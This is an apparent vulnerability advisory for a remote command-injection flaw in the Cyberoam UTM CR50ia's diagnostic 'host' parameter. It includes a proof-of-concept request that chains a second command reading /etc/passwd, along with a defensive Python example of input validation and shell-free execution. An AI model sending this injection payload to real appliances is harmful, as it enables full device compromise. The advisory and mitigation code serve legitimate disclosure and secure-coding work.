Cyberoam UTM 'host' Parameter Remote Command Execution Vulnerability
BID:52664
Info
| Bugtraq ID: | 52664 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 21 2012 12:00AM |
| Updated: | Mar 21 2012 12:00AM |
| Credit: | Saurabh Harit |
| Vulnerable: | Elitecore Technologies Cyberoam UTM CR50ia 10.01.0 build 678 |
| Not Vulnerable: | |
Discussion
Cyberoam UTM is prone to a remote command-execution vulnerability because the appliance fails to adequately sanitize user-supplied input.
Successful exploitation may allow an attacker to execute arbitrary commands and completely compromise the device.
Exploit / POC
An attacker can exploit this issue using a browser.
The following proof-of-concept request parameters demonstrate the issue; the 'host' value carries a shell metacharacter followed by a second command:
__RequestType=ajax&mode=758&tool=1&interface=&host=127.0.0.1 -c 1;cat /etc/passwd&pingipfqdn=127.0.0.1&size=&tracerouteipfqdn=&namelookupipfqdn=&dns=&routelookupipfqdn=&pinginterface=&tracerouteinterface=&selectdns=10.0.0.5&
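As an added defensive illustration (my own code, not the appliance's or the advisory's): the concatenation pattern behind this bug class next to a hardened handler for a diagnostic 'host' parameter that validates the value as an IP literal or RFC 1123 hostname and hands it to ping as a separate argv element, never through a shell. Function names are hypothetical.

```python
import ipaddress
import re
import subprocess

# RFC 1123 hostname label: letters, digits, hyphens, 1-63 chars,
# no leading or trailing hyphen (so a value cannot start as an option).
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def vulnerable_command(host: str) -> str:
    """The pattern that produces this class of bug: an untrusted value is
    spliced into a shell command line. With the advisory's payload the ';'
    terminates ping and the remainder runs as a second command.
    Returned as a string for illustration only; it is never executed here."""
    return "ping -c 4 " + host


def is_valid_host(value: str) -> bool:
    """Accept a literal IPv4/IPv6 address or a syntactically valid hostname.
    Spaces, ';', '|', '$', a leading '-' and empty labels are all rejected."""
    if not value or len(value) > 253:
        return False
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass  # not an IP literal; fall through to the hostname check
    labels = value.rstrip(".").split(".")
    return all(_LABEL.match(label) for label in labels)


def safe_ping_argv(host: str, count: int = 4) -> list:
    """Build ping's argument vector. Validation happens first, and the host is
    its own argv element, so no shell ever parses it."""
    if not is_valid_host(host):
        raise ValueError("invalid host parameter")
    return ["ping", "-c", str(int(count)), host]


def run_ping(host: str, count: int = 4) -> str:
    """Run ping without a shell (shell=False is subprocess.run's default)."""
    argv = safe_ping_argv(host, count)
    done = subprocess.run(argv, capture_output=True, text=True,
                          timeout=30, check=False)
    return done.stdout


if __name__ == "__main__":
    payload = "127.0.0.1 -c 1;cat /etc/passwd"  # the advisory's PoC value
    print(vulnerable_command(payload))          # shows the injected command
    print(is_valid_host(payload), is_valid_host("ns1.example.com"))
```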
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of any more recent information, please mail us at: [email protected].
References
References:
- Cyberoam CR50ia UTM Appliance Product Page (Elitecore Technologies)
- Cyberoam Unified Threat Management: OS Command Execution (Saurabh Harit)
- Cyberoam UTM Homepage (Elitecore Technologies)